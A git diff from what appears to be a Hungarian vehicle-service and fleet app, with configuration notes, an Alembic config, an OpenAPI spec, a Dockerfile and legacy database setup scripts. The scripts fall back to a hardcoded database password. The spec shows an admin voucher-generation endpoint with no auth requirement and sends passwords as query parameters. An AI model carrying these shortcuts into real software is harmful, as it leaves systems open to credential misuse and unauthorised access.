+email_wait_time_minutes int 3 EmailManager +sender_name string Service Finder Email fejléc +sender_email string info@profibot.hu Hitelesített feladó + +📚 VÁLTOZÓ KÖNYV (v2.10 | 2026.01.27 - 21:35) +Kulcs Típus Érték Leírás +email_wait_time_minutes int 3 Minimum idő két levél között. +max_email_retries int 3 Hány szolgáltatóval próbálkozzon hiba esetén. + +📚 VÁLTOZÓ KÖNYV (Email Specifikus) +Kulcs Típus Leírás +email_wait_time_minutes int Mennyit kell várni két levél között (Alap: 3). +max_email_retries int Hányszor próbálkozzon másik szolgáltatóval. +system_sender_email str A feladó neve (pl. info@servicefinder.hu). + +📚 VÁLTOZÓ KÖNYV (v2.9 | 2026.01.27 - 22:15) +Kulcs Érték Modul +weight_distance 0.6 MatchingService +weight_rating 0.4 MatchingService +max_vehicles 3 fleet.py + +📚 VÁLTOZÓ KÖNYV (v2.8 | 2026.01.27 - 21:25) +Változó (Key) Érték Szerep Ellenőrizve (CSV) +weight_distance 0.6 Távolság súlya a rangsorban ✅ Igen +weight_rating 0.4 Értékelés súlya a rangsorban ✅ Igen +bonus_gold_service 500 Fizetős partnerek előnye ✅ Igen +match_limit_default 5 Találati lista hossza ✅ Igen +max_vehicles 3 Flotta limit ✅ Igen + +📚 VÁLTOZÓ KÖNYV (v2.7 | 2026.01.27 - 21:10) + +Minden változó a beküldött tablak_2026.01.27_2.csv alapján rögzítve: +Kulcs (Key) Érték Szerep +max_vehicles 3 Flotta limit (Alapértelmezett) +weight_distance 0.6 Távolság súlya a keresőben +weight_rating 0.4 Értékelés súlya a keresőben +bonus_gold_service 500 VIP szervizek pontszám előnye +match_limit_default 5 Keresési találatok száma + +📚 VÁLTOZÓ KÖNYV (v2.6 | 2026.01.27 - 20:50) +Kulcs (Key) Típus Hivatkozott Modul Elvárt viselkedés +max_vehicles int fleet.py Szervezeti szintű flotta limit. +weight_distance float matching_service.py Keresési rangsor súlyozás (Alap: 0.6). +weight_rating float matching_service.py Keresési rangsor súlyozás (Alap: 0.4). +match_limit_default int search.py Visszaadott találatok száma. + +📚 VÁLTOZÓ KÖNYV (v2.5 | 2026.01.27 - 20:30) +Kulcs Típus Alapérték Szerep +weight_distance float 0.6 Távolság fontossága (0-1). +weight_rating float 0.4 Értékelés fontossága (0-1). +earth_radius_km int 6371 Föld sugara a Haversine számításhoz. +📚 VÁLTOZÓ KÖNYV (v2.4 | 2026.01.27 - 20:45) +Kulcs Típus Alapérték Szerep +geo_precision int 8 Tizedesjegyek száma a koordinátáknál. +distance_unit string km Keresési mértékegység. +📚 VÁLTOZÓ KÖNYV (v2.3 | 2026.01.27 - 19:50) +Kulcs Típus Alapérték Implementáció +weight_distance float 0.6 MatchingService - Aktív +weight_rating float 0.4 MatchingService - Aktív +max_vehicles int 3 fleet.py - Aktív + +📚 VÁLTOZÓ KÖNYV (v2.2 | 2026.01.27 - 20:20) +Kulcs Típus Alapérték Új szerep +weight_distance float 0.6 A térbeli közelség fontossága. +weight_rating float 0.4 A minőség (csillagok) súlya. +📚 VÁLTOZÓ KÖNYV (v2.1 | 2026.01.27 - 19:40) +Kulcs Típus Jelenlegi érték Leírás +weight_distance float 0.6 Mennyire "büntesse" a rendszer a távolságot. +weight_rating float 0.4 Mennyire jutalmazza a jó véleményeket. +bonus_gold_service int 500 A fizetős partnerek fix előnye. +match_limit_default int 5 Alapértelmezett találati szám. +📚 VÁLTOZÓ KÖNYV (v2.0 | 2026.01.27 - 19:30) +Kulcs Típus Alapérték Szerep +weight_distance float 0.6 Mennyire számít a távolság (Admin állíthatja) +weight_rating float 0.4 Mennyire számít az értékelés (Admin állíthatja) +bonus_gold_service int 500 Gold partnerek előnye +match_limit_default int 5 Hány találat jelenjen meg +📚 VÁLTOZÓ KÖNYV (v1.9 | 2026.01.27 - 19:15) +Kulcs Típus Alapérték Hol érhető el? +max_vehicles int 3 ConfigService -> fleet.py +search_radius int 20 ConfigService -> Coming soon +📚 VÁLTOZÓ KÖNYV (v1.8 | 2026.01.27 - 19:10) +Kulcs Típus Alapérték Hol van használatban? +max_vehicles int 3 fleet.py (add_vehicle végpont) +search_radius int 20 Előkészítve a keresőhöz +📚 VÁLTOZÓ KÖNYV (v1.7 | 2026.01.27 - 11:15)Változó neveTípusAktuális értékImplementáció állapotamax_vehiclesint3 (Global)DB-ben rögzítve, fleet.py frissítésre vár.search_radiusint20 (Default)Tervezett: Smart Matching modul.ranking_policyjsonAlapértelmezettTervezett: Ranking Engine. +📚 VÁLTOZÓ KÖNYV (v1.5 | 2026.01.27 - 10:45)Kulcs (Key)TípusAlapértékForrásfájlmax_vehiclesint3app/api/v1/endpoints/fleet.py +📚 VÁLTOZÓ KÖNYV (v1.4 | 2026.01.27 - 10:15)Kulcs (Key)AdattípusAlapértékImplementációs helymax_vehiclesint3backend/app/services/config_service.pysearch_radiusint20Tervezett: search_service.py +📚 VÁLTOZÓ KÖNYV (v1.3 | 2026.01.27 - 10:10)Kulcs (Key)Érték (JSON)SzintModulmax_vehicles3Globalfleet.pysearch_radius20Globalsearch.py +📚 VÁLTOZÓ KÖNYV (Variable Map) v1.2Kulcs (Key)TípusAlapértelmezettFunkciómax_vehiclesint3Járműlimit / szervezetsearch_radiusint20Alap keresési sugár (km) +📚 2. Változó Könyv (Variable Map) v1.1A rendszer paramétereinek aktuális állapota és hivatkozási pontjai.Kulcs (Key)AdattípusAlapértelmezésSzerepHivatkozás (Fájl/Modul)max_vehiclesint3Free flotta méret korlátfleet.py -> ConfigServicesearch_radiusint20Alap keresési távolságsearch.py -> ConfigServiceranking_policyjson{...}Súlyozási együtthatókRankingEngine + +Változó neve,Leírás,Alapértelmezés (Global),Hol szerepel a kódban? +max_vehicles,Ingyenes csomagban rögzíthető autók száma,3,app/api/v1/endpoints/fleet.py +default_search_radius,Alapértelmezett keresési távolság (km),20,app/api/v1/endpoints/search.py +max_search_radius,Maximálisan állítható sugár (km),500,app/api/v1/endpoints/search.py +credit_price_per_unit,1 kredit ára pénznemben,1.0,app/api/v1/endpoints/billing.py diff --git a/alembic.ini b/alembic.ini new file mode 100755 index 0000000..f07ee97 --- /dev/null +++ b/alembic.ini @@ -0,0 +1,150 @@ +# A generic, single database configuration. + +[alembic] +# path to migration scripts. +# this is typically a path given in POSIX (e.g. forward slashes) +# format, relative to the token %(here)s which refers to the location of this +# ini file +script_location = %(here)s/migrations + + +# template used to generate migration file names; The default value is %%(rev)s_%%(slug)s +# Uncomment the line below if you want the files to be prepended with date and time +# see https://alembic.sqlalchemy.org/en/latest/tutorial.html#editing-the-ini-file +# for all available tokens +# file_template = %%(year)d_%%(month).2d_%%(day).2d_%%(hour).2d%%(minute).2d-%%(rev)s_%%(slug)s +# Or organize into date-based subdirectories (requires recursive_version_locations = true) +# file_template = %%(year)d/%%(month).2d/%%(day).2d_%%(hour).2d%%(minute).2d_%%(second).2d_%%(rev)s_%%(slug)s + +# sys.path path, will be prepended to sys.path if present. +# defaults to the current working directory. for multiple paths, the path separator +# is defined by "path_separator" below. +prepend_sys_path = . + + +# timezone to use when rendering the date within the migration file +# as well as the filename. +# If specified, requires the tzdata library which can be installed by adding +# `alembic[tz]` to the pip requirements. +# string value is passed to ZoneInfo() +# leave blank for localtime +# timezone = + +# max length of characters to apply to the "slug" field +# truncate_slug_length = 40 + +# set to 'true' to run the environment during +# the 'revision' command, regardless of autogenerate +# revision_environment = false + +# set to 'true' to allow .pyc and .pyo files without +# a source .py file to be detected as revisions in the +# versions/ directory +# sourceless = false + +# version location specification; This defaults +# to /versions. When using multiple version +# directories, initial revisions must be specified with --version-path. +# The path separator used here should be the separator specified by "path_separator" +# below. +# version_locations = %(here)s/bar:%(here)s/bat:%(here)s/alembic/versions + +# path_separator; This indicates what character is used to split lists of file +# paths, including version_locations and prepend_sys_path within configparser +# files such as alembic.ini. +# The default rendered in new alembic.ini files is "os", which uses os.pathsep +# to provide os-dependent path splitting. +# +# Note that in order to support legacy alembic.ini files, this default does NOT +# take place if path_separator is not present in alembic.ini. If this +# option is omitted entirely, fallback logic is as follows: +# +# 1. Parsing of the version_locations option falls back to using the legacy +# "version_path_separator" key, which if absent then falls back to the legacy +# behavior of splitting on spaces and/or commas. +# 2. Parsing of the prepend_sys_path option falls back to the legacy +# behavior of splitting on spaces, commas, or colons. +# +# Valid values for path_separator are: +# +# path_separator = : +# path_separator = ; +# path_separator = space +# path_separator = newline +# +# Use os.pathsep. Default configuration used for new projects. +path_separator = os + +# set to 'true' to search source files recursively +# in each "version_locations" directory +# new in Alembic version 1.10 +# recursive_version_locations = false + +# the output encoding used when revision files +# are written from script.py.mako +# output_encoding = utf-8 + +# database URL. This is consumed by the user-maintained env.py script only. +# other means of configuring database URLs may be customized within the env.py +# file. +sqlalchemy.url = postgresql+asyncpg://user:pass@postgres-db:5432/service_finder + + +[post_write_hooks] +# post_write_hooks defines scripts or Python functions that are run +# on newly generated revision scripts. See the documentation for further +# detail and examples + +# format using "black" - use the console_scripts runner, against the "black" entrypoint +# hooks = black +# black.type = console_scripts +# black.entrypoint = black +# black.options = -l 79 REVISION_SCRIPT_FILENAME + +# lint with attempts to fix using "ruff" - use the module runner, against the "ruff" module +# hooks = ruff +# ruff.type = module +# ruff.module = ruff +# ruff.options = check --fix REVISION_SCRIPT_FILENAME + +# Alternatively, use the exec runner to execute a binary found on your PATH +# hooks = ruff +# ruff.type = exec +# ruff.executable = ruff +# ruff.options = check --fix REVISION_SCRIPT_FILENAME + +# Logging configuration. This is also consumed by the user-maintained +# env.py script only. +[loggers] +keys = root,sqlalchemy,alembic + +[handlers] +keys = console + +[formatters] +keys = generic + +[logger_root] +level = WARNING +handlers = console +qualname = + +[logger_sqlalchemy] +level = WARNING +handlers = +qualname = sqlalchemy.engine + +[logger_alembic] +level = INFO +handlers = +qualname = alembic + +[handler_console] +class = StreamHandler +args = (sys.stderr,) +level = NOTSET +formatter = generic + +[formatter_generic] +format = %(levelname)-5.5s [%(name)s] %(message)s +datefmt = %H:%M:%S diff --git a/api_spec.json b/api_spec.json new file mode 100755 index 0000000..bfc1a81 --- /dev/null +++ b/api_spec.json @@ -0,0 +1 @@ +{"detail":"Not Found"} \ No newline at end of file diff --git a/api_spec_v2.json b/api_spec_v2.json new file mode 100755 index 0000000..7582bbb --- /dev/null +++ b/api_spec_v2.json @@ -0,0 +1 @@ +{"openapi":"3.1.0","info":{"title":"Traffic Ecosystem SuperApp 2.0","version":"2.0.0"},"paths":{"/api/v1/auth/register":{"post":{"tags":["auth"],"summary":"Register","operationId":"register_api_v1_auth_register_post","parameters":[{"name":"email","in":"query","required":true,"schema":{"type":"string","title":"Email"}},{"name":"password","in":"query","required":true,"schema":{"type":"string","title":"Password"}},{"name":"first_name","in":"query","required":true,"schema":{"type":"string","title":"First Name"}},{"name":"last_name","in":"query","required":true,"schema":{"type":"string","title":"Last Name"}}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/api/v1/auth/verify":{"get":{"tags":["auth"],"summary":"Verify Account","operationId":"verify_account_api_v1_auth_verify_get","parameters":[{"name":"token","in":"query","required":true,"schema":{"type":"string","title":"Token"}}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/api/v1/users/me":{"get":{"tags":["users"],"summary":"Read Users Me","description":"Visszaadja a bejelentkezett felhasználó profilját (Hírnévvel!)","operationId":"read_users_me_api_v1_users_me_get","responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/UserResponse"}}}}}}},"/api/v1/billing/balance":{"get":{"tags":["billing"],"summary":"Get Balance","description":"Visszaadja a felhasználó aktuális kreditegyenlegét és a Széfje (Cége) nevét.","operationId":"get_balance_api_v1_billing_balance_get","responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}}},"security":[{"OAuth2PasswordBearer":[]}]}},"/api/v1/billing/history":{"get":{"tags":["billing"],"summary":"Get History","description":"Kilistázza a kreditmozgásokat (bevételek, költések, voucherek).","operationId":"get_history_api_v1_billing_history_get","responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}}},"security":[{"OAuth2PasswordBearer":[]}]}},"/api/v1/billing/vouchers/redeem":{"post":{"tags":["billing"],"summary":"Redeem Voucher","description":"Bevált egy kódot, és jóváírja az értékét a felhasználó egyenlegén.","operationId":"redeem_voucher_api_v1_billing_vouchers_redeem_post","security":[{"OAuth2PasswordBearer":[]}],"parameters":[{"name":"code","in":"query","required":true,"schema":{"type":"string","title":"Code"}}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/api/v1/billing/vouchers/generate":{"post":{"tags":["billing"],"summary":"Generate Vouchers","description":"Tömeges voucher generálás az admin felületről.","operationId":"generate_vouchers_api_v1_billing_vouchers_generate_post","parameters":[{"name":"count","in":"query","required":false,"schema":{"type":"integer","default":1,"title":"Count"}},{"name":"value","in":"query","required":false,"schema":{"type":"number","default":500.0,"title":"Value"}},{"name":"batch_name","in":"query","required":false,"schema":{"type":"string","default":"ADMIN_GEN","title":"Batch Name"}}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/api/v1/vehicles/search/brands":{"get":{"tags":["vehicles"],"summary":"Search Brands","operationId":"search_brands_api_v1_vehicles_search_brands_get","parameters":[{"name":"q","in":"query","required":true,"schema":{"type":"string","minLength":2,"title":"Q"}}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/api/v1/vehicles/search/providers":{"get":{"tags":["vehicles"],"summary":"Search Providers","operationId":"search_providers_api_v1_vehicles_search_providers_get","parameters":[{"name":"q","in":"query","required":true,"schema":{"type":"string","minLength":2,"title":"Q"}}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/api/v1/vehicles/register":{"post":{"tags":["vehicles"],"summary":"Register User Vehicle","operationId":"register_user_vehicle_api_v1_vehicles_register_post","requestBody":{"content":{"application/json":{"schema":{"additionalProperties":true,"type":"object","title":"Data"}}},"required":true},"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}},"security":[{"OAuth2PasswordBearer":[]}]}},"/api/v1/fleet/vehicles":{"get":{"tags":["fleet"],"summary":"Get My Vehicles","operationId":"get_my_vehicles_api_v1_fleet_vehicles_get","responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}}},"security":[{"OAuth2PasswordBearer":[]}]},"post":{"tags":["fleet"],"summary":"Add Vehicle","operationId":"add_vehicle_api_v1_fleet_vehicles_post","requestBody":{"content":{"application/json":{"schema":{"additionalProperties":true,"type":"object","title":"Vehicle In"}}},"required":true},"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}},"security":[{"OAuth2PasswordBearer":[]}]}},"/api/v1/expenses/add":{"post":{"tags":["expenses"],"summary":"Add Expense","description":"Új költség rögzítése egy járműhöz.","operationId":"add_expense_api_v1_expenses_add_post","requestBody":{"content":{"application/json":{"schema":{"$ref":"#/components/schemas/ExpenseCreate"}}},"required":true},"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}},"security":[{"OAuth2PasswordBearer":[]}]}},"/api/v1/reports/summary/{vehicle_id}":{"get":{"tags":["reports"],"summary":"Get Vehicle Summary","description":"Összesített jelentés egy járműhöz: kategóriánkénti költségek.","operationId":"get_vehicle_summary_api_v1_reports_summary__vehicle_id__get","security":[{"OAuth2PasswordBearer":[]}],"parameters":[{"name":"vehicle_id","in":"path","required":true,"schema":{"type":"string","title":"Vehicle Id"}}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/api/v1/reports/trends/{vehicle_id}":{"get":{"tags":["reports"],"summary":"Get Monthly Trends","description":"Visszaadja az utolsó 6 hónap költéseit havi bontásban.","operationId":"get_monthly_trends_api_v1_reports_trends__vehicle_id__get","security":[{"OAuth2PasswordBearer":[]}],"parameters":[{"name":"vehicle_id","in":"path","required":true,"schema":{"type":"string","title":"Vehicle Id"}}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/api/v2/auth/register":{"post":{"tags":["Authentication V2"],"summary":"Register","operationId":"register_api_v2_auth_register_post","parameters":[{"name":"email","in":"query","required":true,"schema":{"type":"string","title":"Email"}},{"name":"password","in":"query","required":true,"schema":{"type":"string","title":"Password"}},{"name":"first_name","in":"query","required":true,"schema":{"type":"string","title":"First Name"}},{"name":"last_name","in":"query","required":true,"schema":{"type":"string","title":"Last Name"}}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/api/v2/auth/login":{"post":{"tags":["Authentication V2"],"summary":"Login","operationId":"login_api_v2_auth_login_post","requestBody":{"content":{"application/x-www-form-urlencoded":{"schema":{"$ref":"#/components/schemas/Body_login_api_v2_auth_login_post"}}},"required":true},"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/api/v2/auth/forgot-password":{"post":{"tags":["Authentication V2"],"summary":"Forgot Password","operationId":"forgot_password_api_v2_auth_forgot_password_post","parameters":[{"name":"email","in":"query","required":true,"schema":{"type":"string","title":"Email"}}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/":{"get":{"tags":["health"],"summary":"Root","operationId":"root__get","responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}}}}}},"components":{"schemas":{"Body_login_api_v2_auth_login_post":{"properties":{"grant_type":{"anyOf":[{"type":"string","pattern":"^password$"},{"type":"null"}],"title":"Grant Type"},"username":{"type":"string","title":"Username"},"password":{"type":"string","format":"password","title":"Password"},"scope":{"type":"string","title":"Scope","default":""},"client_id":{"anyOf":[{"type":"string"},{"type":"null"}],"title":"Client Id"},"client_secret":{"anyOf":[{"type":"string"},{"type":"null"}],"format":"password","title":"Client Secret"}},"type":"object","required":["username","password"],"title":"Body_login_api_v2_auth_login_post"},"ExpenseCreate":{"properties":{"vehicle_id":{"type":"string","title":"Vehicle Id"},"category":{"type":"string","title":"Category"},"amount":{"type":"number","title":"Amount"},"date":{"type":"string","format":"date","title":"Date"},"odometer_value":{"anyOf":[{"type":"number"},{"type":"null"}],"title":"Odometer Value"},"description":{"anyOf":[{"type":"string"},{"type":"null"}],"title":"Description"}},"type":"object","required":["vehicle_id","category","amount","date"],"title":"ExpenseCreate"},"HTTPValidationError":{"properties":{"detail":{"items":{"$ref":"#/components/schemas/ValidationError"},"type":"array","title":"Detail"}},"type":"object","title":"HTTPValidationError"},"UserResponse":{"properties":{"email":{"type":"string","format":"email","title":"Email"},"first_name":{"anyOf":[{"type":"string"},{"type":"null"}],"title":"First Name"},"last_name":{"anyOf":[{"type":"string"},{"type":"null"}],"title":"Last Name"},"is_active":{"anyOf":[{"type":"boolean"},{"type":"null"}],"title":"Is Active","default":true},"is_superuser":{"type":"boolean","title":"Is Superuser","default":false},"region_code":{"type":"string","title":"Region Code","default":"HU"},"id":{"type":"integer","title":"Id"},"is_company":{"type":"boolean","title":"Is Company"},"company_name":{"anyOf":[{"type":"string"},{"type":"null"}],"title":"Company Name"}},"type":"object","required":["email","id","is_company"],"title":"UserResponse"},"ValidationError":{"properties":{"loc":{"items":{"anyOf":[{"type":"string"},{"type":"integer"}]},"type":"array","title":"Location"},"msg":{"type":"string","title":"Message"},"type":{"type":"string","title":"Error Type"}},"type":"object","required":["loc","msg","type"],"title":"ValidationError"}},"securitySchemes":{"OAuth2PasswordBearer":{"type":"oauth2","flows":{"password":{"scopes":{},"tokenUrl":"/api/v2/auth/login"}}}}}} \ No newline at end of file diff --git a/backend/Dockerfile b/backend/Dockerfile new file mode 100755 index 0000000..25809c6 --- /dev/null +++ b/backend/Dockerfile @@ -0,0 +1,24 @@ +FROM python:3.12-slim + +WORKDIR /app + +# 1. Rendszerfüggőségek telepítése +RUN apt-get update && apt-get install -y --no-install-recommends \ + gcc \ + python3-dev \ + libpq-dev \ + && rm -rf /var/lib/apt/lists/* + +# 2. PIP frissítése (Ez némítja el a panaszkodást) +RUN pip install --upgrade pip + +# 3. Függőségek telepítése +COPY requirements.txt . +RUN pip install --no-cache-dir -r requirements.txt + +# 4. A kód másolása +COPY . . + +ENV PYTHONPATH=/app + +CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8000"] \ No newline at end of file diff --git a/backend/_legacy_backup/build_complex_db.py b/backend/_legacy_backup/build_complex_db.py new file mode 100755 index 0000000..4e59309 --- /dev/null +++ b/backend/_legacy_backup/build_complex_db.py @@ -0,0 +1,95 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +# Cím beállítása +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def build_db(): + print(f"🔌 Kapcsolódás a rendszerhez...") + engine = create_async_engine(DATABASE_URL) + + async with engine.begin() as conn: + print("🏗️ 'DATA' séma előkészítése...") + await conn.execute(text("CREATE SCHEMA IF NOT EXISTS data;")) + + # 1. FELHASZNÁLÓK TÁBLA (Céges/Magán logika) + print("👤 Users tábla létrehozása...") + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS data.users ( + id SERIAL PRIMARY KEY, + email VARCHAR(255) UNIQUE NOT NULL, + password_hash VARCHAR(255) NOT NULL, + role VARCHAR(20) DEFAULT 'PRIVATE', -- 'PRIVATE', 'COMPANY', 'ADMIN' + company_name VARCHAR(255), -- Ha cég + tax_number VARCHAR(50), -- Ha cég + is_active BOOLEAN DEFAULT FALSE, -- Email megerősítésig + created_at TIMESTAMP DEFAULT NOW() + ); + """)) + + # 2. JÁRMŰ TÖRZS (A Fizikai Vas - Tulajdonos nélkül!) + print("🚗 Vehicles tábla létrehozása (A Vas)...") + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS data.vehicles ( + id SERIAL PRIMARY KEY, + model_id INTEGER REFERENCES ref.vehicle_models(id), + vin VARCHAR(50) UNIQUE NOT NULL, -- ALVÁZSZÁM (Az igazi kulcs) + current_plate VARCHAR(20) NOT NULL, -- A mostani rendszám + production_year INTEGER, + created_at TIMESTAMP DEFAULT NOW() + ); + """)) + + # 3. ÉLETÚT ÉS JOGOSULTSÁG (A Történelem) + print("📜 History tábla létrehozása (Kié mikor volt?)...") + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS data.vehicle_history ( + id SERIAL PRIMARY KEY, + vehicle_id INTEGER REFERENCES data.vehicles(id), + user_id INTEGER REFERENCES data.users(id), + + role VARCHAR(20) NOT NULL, -- 'OWNER' (Tulaj), 'DRIVER' (Sofőr), 'LEASE' (Lízingelő) + + start_date DATE NOT NULL, -- Mikor vette át? + end_date DATE, -- Mikor adta le? (Ha NULL, akkor nála van!) + + start_mileage INTEGER, -- Óraállás átvételkor + end_mileage INTEGER, -- Óraállás leadáskor + + is_active BOOLEAN GENERATED ALWAYS AS (end_date IS NULL) STORED -- Segédmező a gyors kereséshez + ); + """)) + + # 4. KÖLTSÉGEK (Szeparált pénzügyek) + print("💸 Costs tábla létrehozása...") + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS data.costs ( + id SERIAL PRIMARY KEY, + vehicle_id INTEGER REFERENCES data.vehicles(id), + user_id INTEGER REFERENCES data.users(id), -- Ki fizette? (Csak ő láthatja!) + + cost_type VARCHAR(50) NOT NULL, -- FUEL, SERVICE, TAX, INSURANCE, LEASE... + amount DECIMAL(10, 2) NOT NULL, + date DATE NOT NULL, + mileage_at_cost INTEGER, + + description TEXT, + document_url VARCHAR(255), -- Fotó linkje + + created_at TIMESTAMP DEFAULT NOW() + ); + """)) + + print("✅ KÉSZ! A Professzionális Adatmodell felépült.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(build_db()) diff --git a/backend/_legacy_backup/check_garage.py b/backend/_legacy_backup/check_garage.py new file mode 100755 index 0000000..ce89d01 --- /dev/null +++ b/backend/_legacy_backup/check_garage.py @@ -0,0 +1,51 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +# DB Config +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def check_data(): + engine = create_async_engine(DATABASE_URL) + async with engine.begin() as conn: + print("\n🚗 A TE GARÁZSOD (User ID: 1):") + print("-" * 80) + + # Ez a lekérdezés összeköti a Történelmet (History), a Vasat (Vehicle) és a Katalógust (Model) + query = text(""" + SELECT + vh.role, + vh.start_date, + v.vin, + v.current_plate, + m.name as brand, + mo.model_name + FROM data.vehicle_history vh + JOIN data.vehicles v ON vh.vehicle_id = v.id + JOIN ref.vehicle_models mo ON v.model_id = mo.id + JOIN ref.vehicle_makes m ON mo.make_id = m.id + WHERE vh.user_id = 1; + """) + + result = await conn.execute(query) + rows = result.fetchall() + + if not rows: + print("📭 A garázs üres.") + else: + for r in rows: + print(f"🔹 {r.brand} {r.model_name} | 🆔 {r.vin} | 🔢 {r.current_plate}") + print(f" Jogviszony: {r.role} | Kezdete: {r.start_date}") + print("-" * 80) + + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(check_data()) diff --git a/backend/_legacy_backup/create_demo_user.py b/backend/_legacy_backup/create_demo_user.py new file mode 100755 index 0000000..4f2f5fe --- /dev/null +++ b/backend/_legacy_backup/create_demo_user.py @@ -0,0 +1,35 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +# Adatbázis elérés +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def create_user(): + print(f"🔌 Kapcsolódás...") + engine = create_async_engine(DATABASE_URL) + + async with engine.begin() as conn: + print("👤 1-es számú felhasználó beszúrása...") + # Kényszerítjük az ID=1-et, hogy passzoljon a main.py-hoz + await conn.execute(text(""" + INSERT INTO data.users (id, email, password_hash, role, is_active) + VALUES (1, 'demo@user.com', 'dummy_hash', 'PRIVATE', TRUE) + ON CONFLICT (id) DO NOTHING; + """)) + + # Frissítjük a számlálót, hogy a következő user ID 2 legyen (ne akadjon össze) + await conn.execute(text("SELECT setval('data.users_id_seq', (SELECT MAX(id) FROM data.users));")) + + print("✅ KÉSZ! A Demo User (ID: 1) létezik.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(create_user()) diff --git a/backend/_legacy_backup/create_dummy_employee.py b/backend/_legacy_backup/create_dummy_employee.py new file mode 100755 index 0000000..f601b9c --- /dev/null +++ b/backend/_legacy_backup/create_dummy_employee.py @@ -0,0 +1,42 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def hire_driver(): + engine = create_async_engine(DATABASE_URL) + + async with engine.begin() as conn: + print("👤 Kovács János (User ID: 2) létrehozása...") + # Létrehozzuk a User-t + await conn.execute(text(""" + INSERT INTO data.users (id, email, password_hash, role, country, default_currency, is_active) + VALUES (2, 'sofor@ceg.hu', 'hash123', 'PRIVATE', 'HU', 'HUF', TRUE) + ON CONFLICT (id) DO NOTHING; + """)) + + # Frissítjük a sorrendet + await conn.execute(text("SELECT setval('data.users_id_seq', (SELECT MAX(id) FROM data.users));")) + + print("🤝 Hozzárendelés a Te cégedhez (ID: 1)...") + # Betesszük a fleet_members táblába + await conn.execute(text(""" + INSERT INTO data.fleet_members (user_id, owner_id, role) + VALUES (2, 1, 'DRIVER') + ON CONFLICT (user_id, owner_id) DO NOTHING; + 